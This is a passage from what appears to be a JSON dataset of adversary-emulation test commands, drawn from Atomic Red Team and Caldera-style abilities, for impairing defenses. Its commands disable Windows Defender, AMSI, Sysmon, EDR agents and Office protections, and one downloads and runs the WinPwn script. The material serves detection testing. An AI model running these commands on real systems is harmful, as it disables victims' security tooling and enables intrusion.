"$excludedpath= \"C:\\Temp\"\nAdd-MpPreference -ExclusionPath $excludedpath", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "$excludedExts= \".exe\"\nAdd-MpPreference -ExclusionExtension $excludedExts", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "$excludedProcess = \"outlook.exe\"\nAdd-MpPreference -ExclusionProcess $excludedProcess", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": null, + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "cmd /c #{DefenderControlExe} /D FFFF | Out-Null\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "cmd /c $env:temp\\DefenderControl\\DefenderControl\\DefenderControl.exe /D #{DefenderID} | Out-Null\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "Try {cmd /c $env:temp\\AdvancedRun.exe /EXEFilename \"$env:systemroot\\System32\\sc.exe\" /WindowState 0 /CommandLine \"stop WinDefend\" /StartDirectory \"\" /RunAs 8 /Run} Catch{}\nif(#{delete_defender_folder}){\n $CommandToRun = rmdir \"$env:programdata\\Microsoft\\Windows Defender\" -Recurse\n Try {cmd /c $env:temp\\AdvancedRun.exe /EXEFilename \"$env:systemroot\\System32\\WindowsPowershell\\v1.0\\powershell.exe\" /WindowState 0 /CommandLine \"$CommandToRun\" /StartDirectory \"\" /RunAs 8 /Run} Catch{}\n}\n", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "& $env:temp\\Backstab64.exe -k -n MsMpEng.exe", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ninv-phantom -consoleoutput -noninteractive ", + "source": "atomics/T1562.001/T1562.001.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Disable or Modify Tools" + }, + { + "command": "Set-ItemProperty -Path HKLM:\\Software\\Policies\\Microsoft\\Windows\\PowerShell -Name ExecutionPolicy -Value ByPass;\n $shell = New-Object -ComObject Wscript.Shell\n Set-ExecutionPolicy Bypass | echo $shell.sendkeys(\"Y`r`n\")", + "source": "data/abilities/defense-evasion/3864fd22-5c63-41c9-bdbc-a66b5ffa3f5e.yml", + "name": "Ensure the ExecutionPolicy is turned to Bypass" + }, + { + "command": "if (Get-Command \"Set-MPPreference\" -ErrorAction SilentlyContinue) {\n Set-MPPreference -DisableRealtimeMonitoring 1;\n} else {\n $service = Get-Service WinDefend -ErrorAction SilentlyContinue;\n if ($service) {\n if ($service.Status -eq \"Running\") {\n Stop-Service WinDefend;\n }\n } else {\n echo \"Windows Defender service not found.\";\n exit 1;\n };\n};\n", + "source": "data/abilities/defense-evasion/49470433-30ce-4714-a44b-bea9dbbeca9a.yml", + "name": "Disable Windows Defender Real-Time Protection" + }, + { + "command": "Set-MpPreference -DisableIntrusionPreventionSystem $true;\nSet-MpPreference -DisableIOAVProtection $true;\nSet-MpPreference -DisableRealtimeMonitoring $true;\nSet-MpPreference -DisableScriptScanning $true;\nSet-MpPreference -EnableControlledFolderAccess Disabled;\n", + "source": "data/abilities/defense-evasion/b007f6e8-4a87-4440-8888-29ceab047d9b.yml", + "name": "Disable Windows Defender All" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1562.001", + "display_name": "Impair Defenses: Disable or Modify Tools", + "atomic_tests": [ + { + "name": "Disable syslog", + "auto_generated_guid": "4ce786f8-e601-44b5-bfae-9ebb15a7d1c8", + "description": "Disables syslog collection\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "package_checker": { + "description": "Package checking command for linux.", + "type": "String", + "default": "(rpm -q rsyslog 2>&1 >/dev/null) || (dpkg -s rsyslog | grep -q installed)" + }, + "package_installer": { + "description": "Package installer command for linux. Default yum", + "type": "String", + "default": "(which yum && yum -y install epel-release rsyslog)||(which apt-get && apt-get install -y rsyslog)" + }, + "flavor_command": { + "description": "Command to disable syslog collection. Default newer rsyslog commands. i.e older command = service rsyslog stop ; chkconfig off rsyslog", + "type": "String", + "default": "systemctl stop rsyslog ; systemctl disable rsyslog" + }, + "cleanup_command": { + "description": "Command to enable syslog collection. Default newer rsyslog commands. i.e older command = service rsyslog start ; chkconfig rsyslog on", + "type": "String", + "default": "systemctl start rsyslog ; systemctl enable rsyslog" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Package with rsyslog must be on system\n", + "prereq_command": "if #{package_checker} > /dev/null; then exit 0; else exit 1; fi\n", + "get_prereq_command": "sudo #{package_installer} \n" + } + ], + "executor": { + "command": "#{flavor_command}\n", + "cleanup_command": "#{cleanup_command}\n", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "Disable Cb Response", + "auto_generated_guid": "ae8943f7-0f8d-44de-962d-fbc2e2f03eb8", + "description": "Disable the Cb Response service\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq \"6\" ];\nthen\n service cbdaemon stop\n chkconfig off cbdaemon\nelse if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq \"7\" ];\n systemctl stop cbdaemon\n systemctl disable cbdaemon\nfi\n", + "name": "sh" + } + }, + { + "name": "Disable SELinux", + "auto_generated_guid": "fc225f36-9279-4c39-b3f9-5141ab74f8d8", + "description": "Disables SELinux enforcement\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "setenforce 0\n", + "cleanup_command": "setenforce 1\n", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "Stop Crowdstrike Falcon on Linux", + "auto_generated_guid": "828a1278-81cc-4802-96ab-188bf29ca77d", + "description": "Stop and disable Crowdstrike Falcon on Linux\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "sudo systemctl stop falcon-sensor.service\nsudo systemctl disable falcon-sensor.service\n", + "cleanup_command": "sudo systemctl enable falcon-sensor.service\nsudo systemctl start falcon-sensor.service\n", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "Disable Carbon Black Response", + "auto_generated_guid": "8fba7766-2d11-4b4a-979a-1e3d9cc9a88c", + "description": "Disables Carbon Black Response\n", + "supported_platforms": [ + "macos" + ], + "executor": { + "command": "sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist\nsudo launchctl unload /Library/LaunchDaemons/com.carbonblack.defense.daemon.plist\n", + "cleanup_command": "sudo launchctl load -w /Library/LaunchDaemons/com.carbonblack.daemon.plist\nsudo launchctl load -w /Library/LaunchDaemons/com.carbonblack.defense.daemon.plist\n", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "Disable LittleSnitch", + "auto_generated_guid": "62155dd8-bb3d-4f32-b31c-6532ff3ac6a3", + "description": "Disables LittleSnitch\n", + "supported_platforms": [ + "macos" + ], + "executor": { + "command": "sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist\n", + "cleanup_command": "sudo launchctl load -w /Library/LaunchDaemons/at.obdev.littlesnitchd.plist\n", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "Disable OpenDNS Umbrella", + "auto_generated_guid": "07f43b33-1e15-4e99-be70-bc094157c849", + "description": "Disables OpenDNS Umbrella\n", + "supported_platforms": [ + "macos" + ], + "executor": { + "command": "sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist\n", + "cleanup_command": "sudo launchctl load -w /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist\n", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "Disable macOS Gatekeeper", + "auto_generated_guid": "2a821573-fb3f-4e71-92c3-daac7432f053", + "description": "Disables macOS Gatekeeper\n", + "supported_platforms": [ + "macos" + ], + "executor": { + "command": "sudo spctl --master-disable\n", + "cleanup_command": "sudo spctl --master-enable\n", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "Stop and unload Crowdstrike Falcon on macOS", + "auto_generated_guid": "b3e7510c-2d4c-4249-a33f-591a2bc83eef", + "description": "Stop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS\n", + "supported_platforms": [ + "macos" + ], + "input_arguments": { + "falcond_plist": { + "description": "The path of the Crowdstrike Falcon plist file", + "type": "Path", + "default": "/Library/LaunchDaemons/com.crowdstrike.falcond.plist" + }, + "userdaemon_plist": { + "description": "The path of the Crowdstrike Userdaemon plist file", + "type": "Path", + "default": "/Library/LaunchDaemons/com.crowdstrike.userdaemon.plist" + } + }, + "executor": { + "command": "sudo launchctl unload #{falcond_plist}\nsudo launchctl unload #{userdaemon_plist}\n", + "cleanup_command": "sudo launchctl load -w #{falcond_plist}\nsudo launchctl load -w #{userdaemon_plist}\n", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "Unload Sysmon Filter Driver", + "auto_generated_guid": "811b3e76-c41b-430c-ac0d-e2380bfaa164", + "description": "Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution, o verify successful execution,\nrun the prereq_command's and it should fail with an error of \"sysmon filter must be loaded\".\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "sysmon_driver": { + "description": "The name of the Sysmon filter driver (this can change from the default)", + "type": "String", + "default": "SysmonDrv" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Sysmon must be downloaded\n", + "prereq_command": "if ((cmd.exe /c \"where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul\") -or (Test-Path $env:Temp\\Sysmon\\Sysmon.exe)) { exit 0 } else { exit 1 }\n", + "get_prereq_command": "Invoke-WebRequest \"https://download.sysinternals.com/files/Sysmon.zip\" -OutFile \"$env:TEMP\\Sysmon.zip\"\nExpand-Archive $env:TEMP\\Sysmon.zip $env:TEMP\\Sysmon -Force\nRemove-Item $env:TEMP\\Sysmon.zip -Force\n" + }, + { + "description": "sysmon must be Installed\n", + "prereq_command": "if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 }\n", + "get_prereq_command": "if(cmd.exe /c \"where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul\") { C:\\Windows\\Sysmon.exe -accepteula -i } else\n{ Set-Location $env:TEMP\\Sysmon\\; .\\Sysmon.exe -accepteula -i}\n" + }, + { + "description": "sysmon filter must be loaded\n", + "prereq_command": "if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0 } else { exit 1 }\n", + "get_prereq_command": "sysmon -u\nsysmon -accepteula -i\n" + } + ], + "executor": { + "command": "fltmc.exe unload #{sysmon_driver}\n", + "cleanup_command": "sysmon -u -i > nul 2>&1\nsysmon -i -accepteula -i > nul 2>&1\n%temp%\\Sysmon\\sysmon.exe -u > nul 2>&1\n%temp%\\Sysmon\\sysmon.exe -accepteula -i > nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Uninstall Sysmon", + "auto_generated_guid": "a316fb2e-5344-470d-91c1-23e15c374edc", + "description": "Uninstall Sysinternals Sysmon for Defense Evasion\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "sysmon_exe": { + "description": "The location of the Sysmon executable from Sysinternals (ignored if sysmon.exe is found in your PATH)", + "type": "Path", + "default": "PathToAtomicsFolder\\T1562.001\\bin\\sysmon.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Sysmon executable must be available\n", + "prereq_command": "if(cmd /c where sysmon) {exit 0} else {exit 1}\n", + "get_prereq_command": "$parentpath = Split-Path \"#{sysmon_exe}\"; $zippath = \"$parentpath\\Sysmon.zip\"\nNew-Item -ItemType Directory $parentpath -Force | Out-Null\nInvoke-WebRequest \"https://download.sysinternals.com/files/Sysmon.zip\" -OutFile \"$zippath\"\nExpand-Archive $zippath $parentpath -Force; Remove-Item $zippath\nif(-not ($Env:Path).contains($parentpath)){$Env:Path += \";$parentpath\"}\n" + }, + { + "description": "Sysmon must be installed\n", + "prereq_command": "if(cmd /c sc query sysmon) { exit 0} else { exit 1}\n", + "get_prereq_command": "cmd /c sysmon -i -accepteula\n" + } + ], + "executor": { + "command": "sysmon -u\n", + "cleanup_command": "sysmon -i -accepteula >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "AMSI Bypass - AMSI InitFailed", + "auto_generated_guid": "695eed40-e949-40e5-b306-b4031e4154bd", + "description": "Any easy way to bypass AMSI inspection is it patch the dll in memory setting the \"amsiInitFailed\" function to true.\nUpon execution, no output is displayed.\n\nhttps://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)\n", + "cleanup_command": "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)\n", + "name": "powershell" + } + }, + { + "name": "AMSI Bypass - Remove AMSI Provider Reg Key", + "auto_generated_guid": "13f09b91-c953-438e-845b-b585e51cac9b", + "description": "With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\\Software\\Microsoft\\AMSI to disable AMSI inspection.\nThis test removes the Windows Defender provider registry key. Upon execution, no output is displayed.\nOpen Registry Editor and navigate to \"HKLM:\\SOFTWARE\\Microsoft\\AMSI\\Providers\\\" to verify that it is gone.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Remove-Item -Path \"HKLM:\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{2781761E-28E0-4109-99FE-B9D127C57AFE}\" -Recurse\n", + "cleanup_command": "New-Item -Path \"HKLM:\\SOFTWARE\\Microsoft\\AMSI\\Providers\" -Name \"{2781761E-28E0-4109-99FE-B9D127C57AFE}\" -ErrorAction Ignore | Out-Null\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Disable Arbitrary Security Windows Service", + "auto_generated_guid": "a1230893-56ac-4c81-b644-2108e982f8f5", + "description": "With administrative rights, an adversary can disable Windows Services related to security products. This test requires McAfeeDLPAgentService to be installed.\nChange the service_name input argument for your AV solution. Upon exeuction, infomration will be displayed stating the status of the service.\nTo verify that the service has stopped, run \"sc query McAfeeDLPAgentService\"\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "service_name": { + "description": "The name of the service to stop", + "type": "String", + "default": "McAfeeDLPAgentService" + } + }, + "executor": { + "command": "net.exe stop #{service_name}\nsc.exe config #{service_name} start= disabled\n", + "cleanup_command": "sc.exe config #{service_name} start= auto >nul 2>&1\nnet.exe start #{service_name} >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Tamper with Windows Defender ATP PowerShell", + "auto_generated_guid": "6b8df440-51ec-4d53-bf83-899591c9b5d7", + "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat Protection will show as disabled\nin Windows settings.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Set-MpPreference -DisableRealtimeMonitoring 1\nSet-MpPreference -DisableBehaviorMonitoring 1\nSet-MpPreference -DisableScriptScanning 1\nSet-MpPreference -DisableBlockAtFirstSeen 1\n", + "cleanup_command": "Set-MpPreference -DisableRealtimeMonitoring 0\nSet-MpPreference -DisableBehaviorMonitoring 0\nSet-MpPreference -DisableScriptScanning 0\nSet-MpPreference -DisableBlockAtFirstSeen 0\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Tamper with Windows Defender Command Prompt", + "auto_generated_guid": "aa875ed4-8935-47e2-b2c5-6ec00ab220d2", + "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. These commands must be run as System, so they still fail as administrator.\nHowever, adversaries do attempt to perform this action so monitoring for these command lines can help alert to other bad things going on. Upon execution, \"Access Denied\"\nwill be displayed twice and the WinDefend service status will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "sc stop WinDefend\nsc config WinDefend start=disabled\nsc query WinDefend\n", + "cleanup_command": "sc start WinDefend >nul 2>&1\nsc config WinDefend start=enabled >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Tamper with Windows Defender Registry", + "auto_generated_guid": "1b3e0146-a1e5-4c5c-89fb-1bb2ffe8fc45", + "description": "Disable Windows Defender from starting after a reboot. Upen execution, if the computer is rebooted the entire Virus and Threat protection window in Settings will be\ngrayed out and have no info.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Set-ItemProperty \"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\" -Name DisableAntiSpyware -Value 1\n", + "cleanup_command": "Set-ItemProperty \"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\" -Name DisableAntiSpyware -Value 0\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Disable Microsoft Office Security Features", + "auto_generated_guid": "6f5fb61b-4e56-4a3d-a8c3-82e13686c6d7", + "description": "Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will not\nshow any warning before editing the document.\n\n\nhttps://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "New-Item -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\"\nNew-Item -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\"\nNew-Item -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\"\nNew-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\" -Name \"VBAWarnings\" -Value \"1\" -PropertyType \"Dword\"\nNew-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\" -Name \"DisableInternetFilesInPV\" -Value \"1\" -PropertyType \"Dword\"\nNew-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\" -Name \"DisableUnsafeLocationsInPV\" -Value \"1\" -PropertyType \"Dword\"\nNew-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\" -Name \"DisableAttachementsInPV\" -Value \"1\" -PropertyType \"Dword\"\n", + "cleanup_command": "Remove-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\" -Name \"VBAWarnings\" -ErrorAction Ignore | Out-Null\nRemove-Item -Path \"HKCU:\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\" -ErrorAction Ignore\n", + "name": "powershell" + } + }, + { + "name": "Remove Windows Defender Definition Files", + "auto_generated_guid": "3d47daaa-2f56-43e0-94cc-caf5d8d52a68", + "description": "Removing definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all arguments.\nOn later viersions of windows (1909+) this command fails even with admin due to inusfficient privelages. On older versions of windows the\ncommand will say completed.\n\nhttps://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "\"C:\\Program Files\\Windows Defender\\MpCmdRun.exe\" -RemoveDefinitions -All\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Stop and Remove Arbitrary Security Windows Service", + "auto_generated_guid": "ae753dda-0f15-4af6-a168-b9ba16143143", + "description": "Beginning with Powershell 6.0, the Stop-Service cmdlet sends a stop message to the Windows Service Controller for each of the specified services. The Remove-Service cmdlet removes a Windows service in the registry and in the service database.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "service_name": { + "description": "The name of the service to remove", + "type": "String", + "default": "McAfeeDLPAgentService" + } + }, + "executor": { + "command": "Stop-Service -Name #{service_name}\nRemove-Service -Name #{service_name}\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Uninstall Crowdstrike Falcon on Windows", + "auto_generated_guid": "b32b1ccf-f7c1-49bc-9ddd-7d7466a7b297", + "description": "Uninstall Crowdstrike Falcon. If the WindowsSensor.exe path is not provided as an argument we need to search for it. Since the executable is located in a folder named with a random guid we need to identify it before invoking the uninstaller.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "falcond_path": { + "description": "The Crowdstrike Windows Sensor path. The Guid always changes.", + "type": "Path", + "default": "C:\\ProgramData\\Package Cache\\{7489ba93-b668-447f-8401-7e57a6fe538d}\\WindowsSensor.exe" + } + }, + "executor": { + "command": "if (Test-Path \"#{falcond_path}\") {. \"#{falcond_path}\" /repair /uninstall /quiet } else { Get-ChildItem -Path \"C:\\ProgramData\\Package Cache\" -Include \"WindowsSensor.exe\" -Recurse | % { $sig=$(Get-AuthenticodeSignature -FilePath $_.FullName); if ($sig.Status -eq \"Valid\" -and $sig.SignerCertificate.DnsNameList -eq \"CrowdStrike, Inc.\") { . \"$_\" /repair /uninstall /quiet; break;}}}", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Tamper with Windows Defender Evade Scanning -Folder", + "auto_generated_guid": "0b19f4ee-de90-4059-88cb-63c800c683ed", + "description": "Malware can exclude a specific path from being scanned and evading detection. \nUpon successul execution, the file provided should be on the list of excluded path. \nTo check the exclusion list using poweshell (Get-MpPreference).ExclusionPath \n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "excluded_folder": { + "description": "This folder will be excluded from scanning", + "type": "Path", + "default": "C:\\Temp" + } + }, + "executor": { + "command": "$excludedpath= \"#{excluded_folder}\"\nAdd-MpPreference -ExclusionPath $excludedpath", + "cleanup_command": "$excludedpath= \"#{excluded_folder}\"\nRemove-MpPreference -ExclusionPath $excludedpath\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Tamper with Windows Defender Evade Scanning -Extension", + "auto_generated_guid": "315f4be6-2240-4552-b3e1-d1047f5eecea", + "description": "Malware can exclude specific extensions from being scanned and evading detection. \nUpon successful execution, the extension(s) should be on the list of excluded extensions.\nTo check the exclusion list using poweshell (Get-MpPreference).ExclusionExtension.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "excluded_exts": { + "description": "A list of extension to exclude from scanning", + "type": "String", + "default": ".exe" + } + }, + "executor": { + "command": "$excludedExts= \"#{excluded_exts}\"\nAdd-MpPreference -ExclusionExtension $excludedExts", + "cleanup_command": "$excludedExts= \"#{excluded_exts}\"\nRemove-MpPreference -ExclusionExtension $excludedExts -ErrorAction Ignore\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Tamper with Windows Defender Evade Scanning -Process", + "auto_generated_guid": "a123ce6a-3916-45d6-ba9c-7d4081315c27", + "description": "Malware can exclude specific processes from being scanned and evading detection.\nUpon successful execution, the process(es) should be on the list of excluded processes. \nTo check the exclusion list using poweshell (Get-MpPreference).ExclusionProcess.\"\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "excluded_process": { + "description": "A list of processes to exclude from scanning", + "type": "String", + "default": "outlook.exe" + } + }, + "executor": { + "command": "$excludedProcess = \"#{excluded_process}\"\nAdd-MpPreference -ExclusionProcess $excludedProcess", + "cleanup_command": "$excludedProcess = \"#{excluded_process}\"\nRemove-MpPreference -ExclusionProcess $excludedProcess\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "office-365-Disable-AntiPhishRule", + "auto_generated_guid": "b9bbae2c-2ba6-4cf3-b452-8e8f908696f3", + "description": "Using the Disable-AntiPhishRule cmdlet to disable antiphish rules in your office-365 organization.\n", + "supported_platforms": [ + "office-365" + ], + "input_arguments": { + "username": { + "description": "office-365 username", + "type": "String", + "default": null + }, + "password": { + "description": "office-365 password", + "type": "String", + "default": null + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "ExchangeOnlineManagement PowerShell module must be installed\n", + "prereq_command": "$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable\nif (-not $RequiredModule) {exit 1}\nif (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}\n", + "get_prereq_command": "Install-Module -Name ExchangeOnlineManagement\nImport-Module ExchangeOnlineManagement\n" + } + ], + "executor": { + "command": "$secure_pwd = \"#{password}\" | ConvertTo-SecureString -AsPlainText -Force\n$creds = New-Object System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $secure_pwd\nConnect-ExchangeOnline -Credential $creds\n$test = Get-AntiPhishRule\nDisable-AntiPhishRule -Identity $test.Name -Confirm:$false\nGet-AntiPhishRule\n", + "cleanup_command": "if(\"#{password}\" -ne \"\") {\n$secure_pwd = (\"#{password}\" + \"\") | ConvertTo-SecureString -AsPlainText -Force\n$creds = New-Object System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $secure_pwd\nConnect-ExchangeOnline -Credential $creds\n$test = Get-AntiPhishRule\nEnable-AntiPhishRule -Identity $test.Name -Confirm:$false\nGet-AntiPhishRule\n} \n", + "name": "powershell", + "elevation_required": false + } + }, + { + "name": "Disable Windows Defender with DISM", + "auto_generated_guid": "871438ac-7d6e-432a-b27d-3e7db69faf58", + "description": "The following Atomic will attempt to disable Windows-Defender using the built in DISM.exe, Deployment Image Servicing and Management tool. \nDISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images.\nA successful execution will not standard-out any details. Remove the quiet switch if verbosity is needed.\nThis method will remove Defender and it's package.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Disable Defender with Defender Control", + "auto_generated_guid": "178136d8-2778-4d7a-81f3-d517053a4fd6", + "description": "Attempting to use Defender Control software to disable Windows Defender. Upon successful execution, Windows Defender will be turned off. \n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "DefenderID": { + "description": "Defender ID that is used as a sort of passcode to disable it within Defender Control from the command line. The machine-specific Defender ID can be obtained within Defender Control by going to menu, command line info, and then retrieving the 4 character passcode to continue (listed after defendercontrol /d /id in the command line info window).", + "type": "String", + "default": "FFFF" + }, + "DefenderControlExe": { + "description": "Path to Defender Control software version 1.6.", + "type": "String", + "default": "$env:temp\\DefenderControl\\DefenderControl\\DefenderControl.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Defender Control must be installed on the machine. \n", + "prereq_command": "if (Test-Path #{DefenderControlExe}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Start-BitsTransfer -Source \"https://web.archive.org/web/20201210152711/https://www.sordum.org/files/download/defender-control/DefenderControl.zip\" -Destination \"$env:temp\\defendercontrol.zip\" -dynamic\nexpand-archive -LiteralPath \"$env:temp\\defendercontrol.zip\" -DestinationPath \"$env:temp\\DefenderControl\"\n" + } + ], + "executor": { + "command": "cmd /c #{DefenderControlExe} /D #{DefenderID} | Out-Null\n", + "cleanup_command": "cmd /c #{DefenderControlExe} /E | Out-Null\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Disable Defender Using NirSoft AdvancedRun", + "auto_generated_guid": "81ce22fd-9612-4154-918e-8a1f285d214d", + "description": "Information on NirSoft AdvancedRun and its creators found here: http://www.nirsoft.net/utils/advanced_run.html\nThis Atomic will run AdvancedRun.exe with similar behavior identified during the WhisperGate campaign.\nSee https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3\nUpon successful execution, AdvancedRun.exe will attempt to run and stop Defender, and optionally attempt to delete the Defender folder on disk. \n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "AdvancedRun_Location": { + "description": "Path of Advanced Run executable", + "type": "Path", + "default": "$env:temp\\AdvancedRun.exe" + }, + "delete_defender_folder": { + "description": "Set to 1 to also delete the Windows Defender folder", + "type": "Integer", + "default": 0 + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Advancedrun.exe must exist at #{AdvancedRun_Location}\n", + "prereq_command": "if(Test-Path -Path #{AdvancedRun_Location}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"http://www.nirsoft.net/utils/advancedrun.zip\" -OutFile \"$env:temp\\advancedrun.zip\"\nExpand-Archive -path \"$env:temp\\advancedrun.zip\" -destinationpath \"$env:temp\\\" -Force\n" + } + ], + "executor": { + "command": "Try {cmd /c #{AdvancedRun_Location} /EXEFilename \"$env:systemroot\\System32\\sc.exe\" /WindowState 0 /CommandLine \"stop WinDefend\" /StartDirectory \"\" /RunAs 8 /Run} Catch{}\nif(#{delete_defender_folder}){\n $CommandToRun = rmdir \"$env:programdata\\Microsoft\\Windows Defender\" -Recurse\n Try {cmd /c #{AdvancedRun_Location} /EXEFilename \"$env:systemroot\\System32\\WindowsPowershell\\v1.0\\powershell.exe\" /WindowState 0 /CommandLine \"$CommandToRun\" /StartDirectory \"\" /RunAs 8 /Run} Catch{}\n}\n", + "cleanup_command": "Try 